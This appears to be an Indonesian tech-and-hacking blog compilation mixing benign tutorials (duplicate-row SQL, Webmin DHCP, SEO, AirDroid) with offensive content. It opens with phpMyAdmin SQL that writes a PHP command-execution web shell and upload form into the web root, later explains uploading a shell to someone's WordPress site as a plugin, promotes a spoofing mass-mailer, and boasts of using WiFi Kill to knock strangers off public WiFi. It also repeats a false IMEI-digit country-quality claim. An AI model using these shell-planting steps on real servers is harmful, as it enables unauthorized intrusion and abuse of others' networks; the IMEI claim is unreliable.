NOTE: 

Ane juga pernah nyobain di localhost
PhpMyAdmin yang ane pakai bawaan dari LAMPP (Linux) yaitu versi 3.2.4

Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux

Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Klik Go! 

Note : Jika XAMPP terinstall di direktori lain, silahkan ganti codingnya di bagian SELECT * INTO OUTFILE 'alamat htdocs nya xampp/cmd.php' from temptab;

Oke ane anggap hasilnya seperti ini :
Your SQL Query has been executed successful

Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows) 
Contoh : http://localhost/cmd.php?cmd=ls <-- ls adalah perintah untuk ngeliat isi file dan direktori di mesin Linux, kalo Windows ya pake dir.

Lanjut lagi!
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!

Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go! 
Ane anggep sukses, sekarang buka http://localhost/form.php

Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.

Pelajaran Database memang sulit sulit tapi mudah, mungkin anda ingin mencari data yang berduplikasi dalam tabel dalam database yang Anda miliki? Dengan menggunakan statement SQL, Anda dapat mengetahui data yang berduplikasi dengan mudah dan cepat.

Bagaimana caranya? Simak artikel ini dengan baik. Untuk pembahasan, akan diambil contoh tabel mahasiswa dengan struktur field berikut ini

NIM -> Varchar(10)
NamaMhs -> Varchar(20)

Pada struktur tabel di atas, memang seharusnya tidak boleh ada data pada field NIM yang berduplikasi. Repot… apabila ada dua atau lebih mahasiswa yang memiliki NIM yang sama.

Bagi programmer yang baik, tentunya akan membuat primary key pada field NIM untuk mencegah duplikasi data.  Namun bagaimana seandainya si programmer lupa untuk memberikan primary key pada NIM, padahal data mahasiswa sudah telanjur tersimpan dalam tabel? Jangan khawatir wahai programmer… ada cara untuk mencari data yang berduplikasi. Gunakan saja statement SQL.

Begini perintahnya:

view sourceprint?
SELECT nim, count(*) as jumlah FROM namatabel
GROUP BY nim ORDER BY jumlah DESC;
Perintah di atas akan menghitung jumlah data untuk setiap kelompok nim. Secara logika, suatu nim akan unik atau tunggal jika jumlah nimnya adalah 1. Sedangkan nim yang berduplikasi, apabila jumlah data pada nim tersebut adalah lebih dari 1.

Sebagai contoh, perhatikan data yang tersimpan dalam tabel di atas (sampel saja)Â  berikut ini:

NIM  Nama Mhs
001   si A
002   si B
001   si C
003   si D
002   si E
Dari contoh record di atas, setelah diberikan perintah SQL yang telah saya berikan sebelumnya, akan dihasilkan

NIM   jumlah
001   2
002   2
003   1
Dari hasil yang diperoleh tampak bahwa terdapat NIM 001 yang berduplikat (sejumlah 2 data) dan NIM 002 yang juga 2 data. Perintah ORDER BY jumlah digunakan untuk mengurutkan jumlah data tiap kelompok NIM mulai yang terbesar. Harapannya supaya data yang duplikat terletak di paling atas dalam tampilan, sehingga kita enak mencarinya.

Temen temen udah pernah belajar Setting DHCP Server dengan Webmin belum? Baik kalau yang belum saya sedikit kasih cara tentang Setting DHCP Server dengan webmin, semoga bermanfaat ya, baik caranya sebagai berikut ini :

Permulaan anda Login pada webmin pada alamat https://localhost:10000
kemudian lanjut
1. Pilih Menu Servers -> DHCP Server


2. Membuat Subnet -> Pilih Add a new subnet


    Isi seperti gambar berikut
    * Sesuaikan jika anda menginginkan IP yang berbeda

Klik Untuk Memperbesar Gambar

    Jika suda selesai maka akan tampil seperti berikut


Klik Untuk Memperbesar Gambar

   Kemudian pilih subnet yang telah dibuat tadi, disini adalah 192.168.1.0
   pada bagian bawah pilih Edit Client Options, isikan seperti gambar berikut dan simpan

Klik Untuk Memperbesar Gambar

   Jika telah selesai jangan lupa editlah file /etc/default/dhcp3-server
   Cari baris interface lalu tambahkan interface mana yang akan menggunakan DHCP server,
   missal: eth0
Sebelum:
INTERFACES=""
Sesudah:
           INTERFACES="eth0"


   Jika sudah Klik pada bagian bawah jalankan DHCP Server


Barc0des - Akhir akhir ini ada salah satu media yang gencar memberitakan tentang sosok hacker berulah dan mengirimkan surel ke member group milist.

Beberapa laporan ke inbox fanspage facebook mengalir tentang berita ini dan kebenarannya, apakah benar di retas?

Sekarang kami tanya kepada anda, apakah anda percaya dengan berita ini? kalau anda menjawan "Percaya" berarti anda kudu dan wajib mempelajari apa itu hacker dan cukup tau tekniknya aja, "Tidak Percaya" berarti anda orang yang paham it.

Santer berita itu di minggu ini membuat kuping saya gatal, berikut ini saya jelaskan mengenai sosok sang pengaku hacker peretas email.
  1. Akun Email kang Ono tidak di retas sama sekali, mereka cuma memanfaatkan sumber email kang ono dan menyebarkan berita ke group milist.
  2. Email kang Ono sebagai sumber pengirim, mereka hanya menggunakan tools mailer, didukung dengan SMTP Mailer dari server sehingga mereka bisa menyebarkan email ke anggota group milist tersebut. Masih penasaran seperti apa? Berikut ini screenshoot tools mailernya :


Dari tools ini anda bisa mengirim keseluruh email target yang ingin anda kirim, termasuk group milist, kebetulan kemarin sosok sang pengaku hacker mengirim ke sumber email :
w*rn*t@yahoogroups.com
orari-n*ws-own*r@yahoogroups.com
IndoWLI-*wn*r@yahoogroups.com
Tel*mat*ka@yahoogroups.com
mast*l-*nggota@yahoogroups.com

Bingung cara menggunakannya? anda cukup upload di hosting anda lalu buka file mailer ini, maka anda sesuka hati mengirim kemana pun anda inginkan, tools ini biasanya untuk penipuan serta untuk pemasaran, so? saran saya jangan buat kejahatan tapi gukanan untuk kebaikan, semisal mengirim informasi terupdate atau kegiatan anda, bagi yang mau file mailernya disini unduhnya :


Sekarang anda sudah tau teknikanya bukan? jadi jangan jadi orang mudah terpropokasi tentang berita miring dan jangan buat berita itu jadi wah! lakukan hal yang paling mudah, yaitu masukan email yang tidak berguna ke spam, agar penyedia email setiap kita dapat kiriman itu langsung masuk spam. Semoga bermanfaat

Kalian pasti tahu Android bukan? pertanyaannya adalah, kalian pake os android di mobile ga? kalau pake Bb mendingan jangan baca deh, karena ini tulisan untuk android heheh. Tau andoid itu apa? yapp.. OS yang paling trend tahun 2013 ini sangat populer dari kalangan remaja, sampai orang tua pun ikut memiliki Ponsel yang berbasis Android naahh.. apakah kalian tahu bahwa Android yang anda miliki itu Asli atau Palsu?

Mari kita coba buktikan ponsel anda, dengan mengikuti Tutorial Simple dari saya, mari disimak gan :

Anda ketik di Ponsel anda :
*#06#
tidak perlu di pencat telpon (gambar phone warna ijo)
nanti ada keterangan No IMEI Ponsel anda
Contoh:
Jika angka ke 7 dan ke 8 dari no IMEI tersebut 02 atau 20, berarti itu produk ASIA kualitas Sangat jelek
Jika 08 atau 80, brarti produk Jerman kualitas Lumayan
jika 01 atau 10, berarti Produk Findlandia dengan kualitas Bagus
jika 00 berarti Produk Prancis dengan kualitas Paling Baik.

Saya punya tips dan trick nih untuk temen temen yang punya web atau mau buat web. Halaman web yang profesional mempunyai banyak fungsi. diantaranya paling tidak, cukup cepat me-load halaman, Halaman web menjadi lebih menarik dll. Karena itu saya sekarang disini akan share tentang 10 Cara Agar Halaman Website/Blog Berpenampilan Profesional

1. Lakukan pengecekan halaman pada beberapa browser yang berbeda
Tampilan halaman anda begitu cantik di browser firefox tetapi belum tentu bagus di browser Internet Explorer atau Opera atau browser yang lain. Ingat pengunjung blog anda tidak hanya menggunakan satu browser saja. untuk itu anda coba lakukan pengecekan dengan browser yang berbeda, misalkan : Firefox, Flock, Mozilla, Internet Explorer, Opera, Safari dsb.

2. Hindari Memasang Jam dan Kalender
Tanyakan pada diri anda sendiri apa gunanya memasang jam di blog anda, jika hanya sebagai pengingat waktu atau untuk mempercantik halaman sebaiknya tidak usah digunakan, apa gunanya jam pada taksbar windows. yang jelas bakal bikin load page anda semakin berat. Kemudian apa gunanya kalender windows? orang butuh informasi dari blog anda bukan ingin melihat kalender.

3. Jangan memelas untuk meminta mengklik iklan
hindari kata "tolong klik iklan dibawah ini" atau bahasa apapun yang meminta pengunjung anda untuk mengklik iklan. Paling tidak, hanya sekedar memasang untuk selang seling saja sudah cukup. Tapi sampai saat ini ada beberapa blog yang melakukan hal tersebut (maaf jika blog anda termasuk dalam hal ini) , Tanpa anda menyuruhpun pengunjung bakal mengklik iklan tersebut jika dirasa berguna bagi mereka. Selain itu, memasang terlalu banyak iklan juga dapat memperlambat load halaman web terutama yang bentuk banner, sehingga pasanglah iklan secukupnya sesuai kapasitas load halaman web.

4. Hindari memasang lagu pada blog
Selain bikin halaman berat blog yang menampilkan lagu agak terkesan tidak profesional dan maaf agak terkesan jaman dulu (jadul). Tidak masalah jika blog anda tentang musik atau blog personal tapi untuk blog bisnis atau yang lain sepertinya kurang cocok.

5. Jangan Menampilkan status IP pengunjung
Blog anda bukan program spy (mata-mata) kan?, jadi lebih baik tidak usah dipasang agar pengunjung tidak merasa dimata-matai.

6. Tidak Memasang widgets yang tidak ada hubunganganya dengan blog
Menambahkan widgets memang menyenangkan tapi jika tidak ada hubungannya malah blog anda terkesan aneh. pasanglah widget sesuai dengan kebutuhan saja.

7. Jangan hanya Copy-Paste
Saya tidak melarang anda untuk melakukan Copy-Paste, jika memang dilakukan sebaiknya perbaiki juga code scriptnya, hargai jerih payah penulis sebenarnya karna jika hanya copy-paste tulisannya tidak bakal terlihat rapi dan kemungkinan gambar yang diikutsertakan tidak bakal muncul. Tapi sebenarnya ini akan mendapat respon buruk dari pembaca, karena pembaca akan berpikir lebih baik membaca langsung dari sumbernya.( Blog ini juga "copy paste".Tips ini hanya untuk mendapatkan yang lebih baiknya saja ).

8. Jangan gunakan gambar yang besar
Gambar memang mempercantik halaman anda, gambar yang besar justru jadi bumerang buat loading page anda. yang jelas blog anda pasti akan diabaikan untuk sementara waktu ketika loading page sedang berjalan.

9. Periksa Dead link
Link yang telah mati bakal tidak disukai pembaca, jangan kan pembaca search engine pun tidak menyukai hal ini. Lakukan pengecekan dead link sesering mungkin.

10. Cara merespon komentar yang baik
Jangan pernah bersikap menggurui, hargai semua komentar dengan bijak walau pun ada beberapa komentar yang menyebalkan. Ingat! blog tempat orang menuangkan semua ide dan pemikiran jadi semua orang pasti mempunyai pendapat yang berbeda.

Cara solusi berikut berawal banyaknya SMS yang masuk dan mesti membalas satu persatu. Begitu ribetnya membalas satu persatu SMS yang masuk menggunakan keypad android yang kecil dari handphone Samsung Galaxy Chat. 

Muncul ide bagaimana cara membalas banyaknya SMS yang masuk dari HP menggunakan komputer atau laptop. Akhirnya berbagai macam dari beberapa solusi dan aplikasi dicoba, akhirnya pilihan jatuh pada aplikasi yang bernama Airdroid.




Fungsi aplikasi Airdroid :
  • Mengirim dan menerima SMS dari laptop atau komputer
  • Menghapus SMS di handphone dari laptop atau komputer
  • Mengirim file dari komputer ke handphone
  • Mengambil file dari handphone ke komputer
  • Mendownload & menginstal aplikasi android / apk dari komputer
  • Memutar file musik dan video yang ada di handphone melalui komputer
  • Melihat, merubah, dan menambah nomor kontak yang ada di handphone melalui komputer dll 

Syarat untuk bisa menggunakan aplikasi Airdroid :
  • Handphone harus berbasis android
  • Handphone ada fasilitas wifi
  • Komputer atau laptop ada fasilitas wifi
  • Antara komputer dan handphone masih dalam jangkauan area hotspot / wifi yang sama

Ada 2 langkah untuk bisa menikmati layanan aplikasi Airdroid.

Pertama
Instal aplikasi Airdroid di Handphone, search saja melalui Google Play. Cara settingnya mudah, tinggal next next 

Kedua
- Buka web browser bisa pakai Firefox. ketikkan "web.airdroid.com" pada addres bar
- Masukkan code yang ada di handphone untuk login
- Akan tampil pada web browser menu seperti gambar dibawah, selanjutnya silahkan di pelajari sendiri mudah gak pake ribet.

WiFi Kill Gausah di tanya lagi gan soal kegunaanya, dari namanya aja kita udah tau fungsinya itu buat apaan, cara kerja aplikasi ini adalah dengan cara mutusin jaringan HH orang yang terkoneksi ke WiFi tersebut om. Misalkan temen agan dan agan WiFian bareng dengan pake 1 WiFi cuma karna temen om ikut WiFian juga otomatis sinyal WiFi yang masuk ke HH agan pasti cuma sedikit kan om nah agan isengin aja pake aplikasi ini dengan cara mutusin jaringan dia.

Waktu itu aplikasi ini juga udah ane coba kok om di Sevel daerah Jakarta, ane putusin semua jaringan orang orang yang terkoneksi ke WiFi dan hasilnya ane buka Yutub tanpa buffering gan, ane juga sempet downdload file yang MBnya sampe 70MBan dan ane download itu kurang lebih 15Menitan Gausah takut om buat ketauan karna aplikasi ini ga bakalan bisa ke Detect, tapi syaratnya HH agan harus udah di Root.

Spek Minimal : Android 4.x, gadget yang telah di-ROOT
FEATURES
* grabbing traffic, showing websites visited by grabbed device
* showing bytes transferred by “grabbed device”
* tablet friendly!
* android 4.x only

CHANGELOG
* v2.2 – 03-02-2013
o Improve grab/kill effectiveness
o Fixed killing problem due to iptables rules
o Fixed grab all button behavior and status device count
o Fixed url list scrolling issue
o Fixed some devices missing upon start
o Added udp protocol blocking
o Fixed Force-Close when device name was empty
o Fixed Service Fail upon start
* v2.1 – 25-12-2012
o VERSION CHANGED to 2.1 to end the confusion 
o Enlarge device name input field (thanks m.kucharskov)
o Add long click on url to open in browser (again m.kucharskov)
o Add NetBIOS name resolution (network name)
o Add preference (settings) screen
* v1.2 – 31-10-2012
o fixed crappy UI on Samsung devices (yes that switches are normal now)
o fixed some dependency on play store downloader (which is now available here)

Team jailbreak telah merilis tools baru untuk melakukan jailbreak untethered pada semua iOS 6 dan prangkat iOS 6.1 .Ini adalah tools pertama yang di gunakan untuk jailbreak iPhone 5 & iOS 6.1 sehingga user akan dapat kembali menikmati app gratis dari store.

Dengan tool Evasi0n menjadikan jailbreak menjadi sangat mudah dan anda hanya akan menunggu prosesnya sampai selesai,hal ini juga menjawab pertanyaan apakah iOS 6 masih bisa di jailbreak.

Langkah sebelum melakukan Jailbreak dengan Evasi0n :

  1. Prangkat yang kompitable iPad mini, iPad 2, iPad 3, iPad 4, iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, dan iPod touch 4th atau 5th.
  2. Upgrade iOS anda ke versi iOS 6.0 atau iOS 6.1
  3. Download tools  jailbreak Evasi0n dan ekstrax filenya pada komputer anda.
  4. Kabel USB untuk melakukan jailbreak dari komputer anda.


Untuk mengantisipasi hal yg tidak di inginkan sebaiknya anda membackup data terlebih dahulu.Jika anda gagal melakukan jailbreak maka anda dapat melakukan restore data anda.
  • Jailbreak iOS 6 menggunakan Evasi0n Tools
  • Jailbreak dapat dilakukan melalui Windows, Linux dan Mac OS X


Langkah Jailbreak menggunakan Evasi0n Tools
  1. Matikan iOS lock dengan cara Masuk ke Setting >> General >> Passcode Lock >> Turn Off
  2. Hubungkan kabel usb ke PC anda
  3. Buka folder Evasi0n dan jalankan aplikasi Evasi0n
  4. Setelah perangkat di kenali oleh Evasion, klik tombol “Jailbreak” dan biarkan Evasi0n melakukan eksekusi.




5. Guna melengkapi proses jailbreak maka cari icon bergambar Evasi0n di perangkat iOS anda dan touch icon tersebut.


6. Setelah eksekusi selesai maka perangkat akan automatis melakukan reboot dan menampilkan logo Evasi0n.Setelah layar kembali pada Home Screen dan anda telah melihat icon Cydia berarti menandakan bahwa jailbreak anda telah sukses.



7. Sebelum melakukan instalasi app anda harus touch icon Cydia agar proses jailbreak berhasil dengan sempurna.
8. Berhubung server Installous sudah tidak bisa di gunakan lagi maka kita harus instal server penggantinya yaitu Appcake.

Meta keyword merupakan salah satu cara efektif untuk menambah pundi-pundi SEO pada blog. Cara untuk menambahkan meta keyword di blogspot :

1.  Buka "Template" pada dashbord blogspot Anda kemudian klik "Edit Html"

2.  Letakkan kode berikut di bawah <head>
<meta content='DESKRIPSI BLOG ANDA' name='description'/>
<meta content='KEYWORD ATAU KATA KUNCI BLOG ANDA' name='keywords'/>
Contoh :
<meta content='Tips dan Trik untuk Blog, Sesepuh-ilmu' name='description'/>
<meta content='tutorial komputer, cara sevis komputer, artikel tentang komputer, cara membuat blog, modifikasi blog' name='keywords'/>
3.  Untuk keyword postingan artikel blog Anda, letakkan kode berikut dibawah
<b:include data='blog' name='all-head-content'/>"
<b:if cond='data:blog.pageType == &quot;item&quot;'>
<title><data:blog.pageName/> - <data:blog.title/></title>
<b:else/>
<title><data:blog.pageTitle/></title>
</b:if>
<b:if cond='data:blog.url == &quot;http://blogAnda.blogspot.com/artikel1.html&quot;'>
<meta content='DESKRIPSI ARTIKEL 1 BLOG ANDA' name='description'/>
<meta content='KATA KUNCI ARTIKEL 1 BLOG ANDA' name='keywords'/></b:if>
<b:if cond='data:blog.url == &quot;http://blogAnda.blogspot.com/artikel2.html&quot;'>
<meta content='DESKRIPSI ARTIKEL 2 BLOG ANDA' name='description'/>
<meta content='KATA KUNCI ARTIKEL 2 BLOG ANDA' name='keywords'/></b:if>
<b:if cond='data:blog.url == &quot;http://blogAnda.blogspot.com/artikel3.html&quot;'>
<meta content='DESKRIPSI ARTIKEL 3 BLOG ANDA' name='description'/>
<meta content='KATA KUNCI ARTIKEL 3 BLOG ANDA' name='keywords'/></b:if>
Dan seterusnya sesuai jumlah artikel yang akan dipublikasikan, tapi jika anda ribet, anda tidak memasang konten ini tidak jadi masalah, karena saya takut ini akan menjadi masalah terhadap TOS SEO, dulu sih tidak masalah, tapi coba kan gpp...

4. Klik "Save"

Semakin banyak artikel blogspot Anda semakin banyak kata kunci yang dibuat, maka semakin panjang kode template blog Anda. Untuk itu Anda pilih artikel yang akan dipublikasikan saja yang dibuat kata kuncinya. Tidak usah semua halaman dibuatkan kata kuncinya.

langsung aja share sedikit cara upload shell via plugin 

1. rubah/jadikan shell anda ke dalam bentuk file .zip
http://prntscr.com/oq3l8

2. login ke dalam web yang akan di colikan -_-


3. setelah masuk, go to plugin ---> add new
http://prntscr.com/oq431

4. klik tab upload
 http://prntscr.com/oq495

5. Upload shel yang sudah dijadikan .zip tadi
setelah selesai, pasti akan seperti ini


6. shell sudah di upload. cara memanggilnya dengan cara memainkan url

http://www.site.com/wp-content/upgrade/namafile(nama file .zipnya)/isifile.php

MISAL NAMA FILE .zip NYA "coli.zip" maka commandnya
http://www.site.com/wp-content/upgrade/hacker/hacker.php

hasil
http://prntscr.com/oq6l8

SEMOGA TUTOR INI BERMANFAAT! KALO MISALNYA BINGUNG BISA HUBUNGI KAMI DI FACEBOOK! 



bye~
Code-Security



Selamat malem temen temen, gimana kabarnya? baik kan? pasti masih pada nunggu tulisan terbaru barc0des ya? baik, kali ini ane mo share tentang kejadian unik saat ane lagi brosing.

Awalnya ane mo cari software bagus di situs idws, tapi yang muncul apa? jquery video player tentang para artis yang ngedukung sebuah situs yang baru mangkir ke permukaan internet.

Dia memboikot klo mereka pengen nyatuin situs situs karya indonesia dengan menempelkan di situsnya, biar rapih kali ane ga tau dadh kesananya. Awalnya ane seru gitu ngeliat ada situs detik dan lainya lah, so? ane langsung daftar di situs :

klikindonesia.org

Tapi ada yang ganjal dalam satu sisi, kenapa? coba liat screenshoot yang ane ambil dan kita cocokan dengan kenyataan :

1. Tampilan situs yang menjual para artis indonesia di videonya, bagus juga sih dan menarik so unik juga

2. Mereka membawa beberapa situs ternama di indonesia, tapi di situs mereka sendiri ga ada? :o ada apa hayo???

3. Verifikasi website bukannya nyuruh kita untuk di daftarkan, tapi nyuruh masangin SEO di web kita untuk kepentingan mereka? wa....wawawah... curang...!!

4. Cara verivikasi yang sama dengan produk google..!! katanya di video "Dunia nyata maupun dunia maya, Nyaris habis dijarah tanpa tersisa" tapi mereka sendiri ngejiplak? waw...!!

5. Script verifikasinya cuma bualan. Beda sama punya mbah google... ini mah teknik seo cek kedul...

Kita buktikan dengan produk google yaitu GOOGLE WEB MASTER, pasti temen temen pada tau lah, cek kemiripan dan teknik seo google. pasi hampir sama... wah ati ati ya om gan dan ibu tentang situs bualan yang bilang kita di jajah tapi mereka yang pengen jadi raja



Pesan : "Dunia maya adalah dunia kebebasan, berkreasi dengan apa yang anda bisa guna untuk kemanfaatan orang lain, bukan kreasi yang menguntungkan sendiri dan memanfaatkan sendiri"


Fans Page Facebook

Populer